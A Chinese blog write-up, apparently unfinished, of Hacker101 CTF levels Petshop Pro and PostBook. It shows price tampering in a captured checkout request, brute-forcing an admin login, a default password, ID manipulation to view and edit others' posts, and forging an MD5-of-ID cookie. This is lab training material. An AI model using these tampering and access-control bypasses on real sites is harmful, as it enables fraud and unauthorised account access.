【F2C】hacker101 writeup(更新中)

Hacker101练习地址


一些参考:

https://www.anquanke.com/post/id/180186#h2-1

https://github.com/testerting/hacker101-ctf

https://zhuanlan.zhihu.com/p/61338756

Hacker101](https://ctf.hacker101.com/ctf)练习地址

一些参考:

https://www.anquanke.com/post/id/180186#h2-1

https://github.com/testerting/hacker101-ctf

https://zhuanlan.zhihu.com/p/61338756

Petshop Pro

**flag0

  • Something looks out of place with checkout
  • It’s always nice to get free stuff

选了个小动物加入购物车之后去结账

checkout界面

POST /43a063d40c/checkout HTTP/1.1
Host: 34.74.105.127
Content-Length: 188
Cache-Control: max-age=0
Origin: http://34.74.105.127
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://34.74.105.127/43a063d40c/cart
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=eyJjYXJ0IjpbMF0sIm1vZGlmaWVkIjp0cnVlfQ.XTKvXQ.sWSc3unmCOQG1axQ55vqwvP9P3o
Connection: close

cart=%5B%5B0%2C+%7B%22logo%22%3A+%22kitten.jpg%22%2C+%22price%22%3A+8.95%2C+%22name%22%3A+%22Kitten%22%2C+%22desc%22%3A+%228%5C%22x10%5C%22+color+glossy+photograph+of+a+kitten.%22%7D%5D%5D

解码后变成

[[0, {"logo": "kitten.jpg", "price": 8.95, "name": "Kitten", "desc": "8\"x10\" color glossy photograph of a kitten."}]]

提示说要免费,价格改为0再提交一次,flag get #

flag1

  • There must be a way to administer the app
  • Tools may help you find the entrypoint

在没看到第二条提示的情况下试了试在url后面加了个login,还真的有[手动狗头]

先试了下注入,不是很行。暴力破解吧那就……

PostBook

flag0

  • The person with username “user” has a very easy password…

user/password

flag get#

flag1

  • Try viewing your own post and then see if you can change the ID

第一个helloword是

http://35.227.24.107/684e8372d4/index.php?page=view.php&id=1

第二个hello everyone是

http://35.227.24.107/684e8372d4/index.php?page=view.php&id=3

看一下id为2的,flag get#

flag2

在创建新post的时候发现参数里带了个user_id,改了改

(一开始没找到,原来藏在返回头里),flag get#

flag3

  • 189 * 5

这个题有点重复了,访问id为189*5的页面。

flag4

  • You can edit your own posts, what about someone else’s?

第一篇helloworld是admin用户写的,没有编辑按钮,直接从编辑url进入

http://35.227.24.107/684e8372d4/index.php?page=edit.php&id=1

保存一下,flag get#

flag5

cookie就是id的md5,改一下访问home页面。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值